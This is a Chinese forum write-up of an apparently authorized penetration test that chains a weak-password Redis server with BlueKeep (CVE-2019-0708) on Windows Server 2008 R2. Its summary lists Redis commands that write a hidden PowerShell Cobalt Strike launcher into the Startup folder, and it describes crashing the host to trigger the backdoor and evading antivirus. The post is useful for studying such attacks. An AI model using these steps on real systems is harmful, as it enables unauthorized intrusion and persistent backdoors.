標題:Redis未授權+CVE-2019-0708組合拳利用

taibeihacker

Moderator

0x01 简介

本次測試為實戰測試,測試環境是授權項目中的一部分,敏感信息內容已做打碼處理,僅供討論學習。請大家測試的時候,務必取得授權。
拿到授權項目的時候,客戶只給我了一個公司名字,這里以某某公司代替。

0x02 信息搜集

老辦法,先是子域名掃描,然後目錄掃描,發現了個雞毛,啥利用點也沒有,而且是雲主機。進一步探測資產,歐力給,發現了CVE-2019-0708。 targetr是windows server 2008 r2系統。

0x03 Getshell

心想,發現了CVE-2019-0708,這樣shell總穩了吧。這時遲那時快,拿出我的大保健msf,梭哈一波。臥槽,居然發現不能利用,探測到有漏洞,但是創建session失敗。
1049983-20220124162648523-1136083651.jpg
不甘心,settarget也沒用,攻擊了20多次,還是一樣的錯誤,害苦了客戶的靶機,跟著藍屏20多次。
繼續看,發現有redis資產,嘗試弱口令看看,居然密碼是123123,先查看一下信息:
1049983-20220124162648969-50025.jpg

這裡利用有個難點,就是我們根本不知道網站的實際物理路徑,嘗試報錯或者物理路徑爆破,無果~~~,所以無法通過寫一句話等形式拿下Webshell;這裡也沒有像linux一樣的反彈利用;也沒有計劃任務可寫。
經過前期的信息收集發現是windows server 2008 r2,我們可以寫一個啟動木馬的腳本放到啟動裡面,然後利用CVE-2019-0708“強迫”主機重啟。
說乾就乾,這裡用powershell的cs馬(請注意免殺,這裡不討論)。先設置redis的工作目錄為windows的啟動目錄,然後寫cs的馬,最好記得務必save,否則一直會在內存中。
1049983-20220124162649397-71561947.jpg
利用CVE-2019-0708“強迫”主機重啟。可以看到已經順利上線。
1049983-20220124162649739-459355595.jpg
經過實測,這個啟動項是可以過國內某殺軟的,但是在調用cmd時會被攔截。
1049983-20220124162650156-1916410730.jpg

0x03 总结​

1.通過信息收集發現目標存在cve-2019-0708漏洞,漏洞利用發現系統藍屏重啟2.通過nmap掃描發現目標系統開放了3679端口,該端口未redis服務3.嘗試通過弱口令進入123123可進入到目標系統,但是現在不知道網站的根目錄,只能將後門寫入到啟動項4.在CS中生成PS腳本後門5.在redis命令下進行寫馬config set dir 'c:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/'config set dbfilename update.batset shell '\r\n\r\npowershell.exe -nop -w hidden -c 'saveinfo6.通過cve-2019-0708漏洞藍屏重啟,成功上線CS原文連接:https://mp.weixin.qq.com/s?__biz=Mz...7scene=178cur_album_id=1553386251775492098#rd
 
返回
上方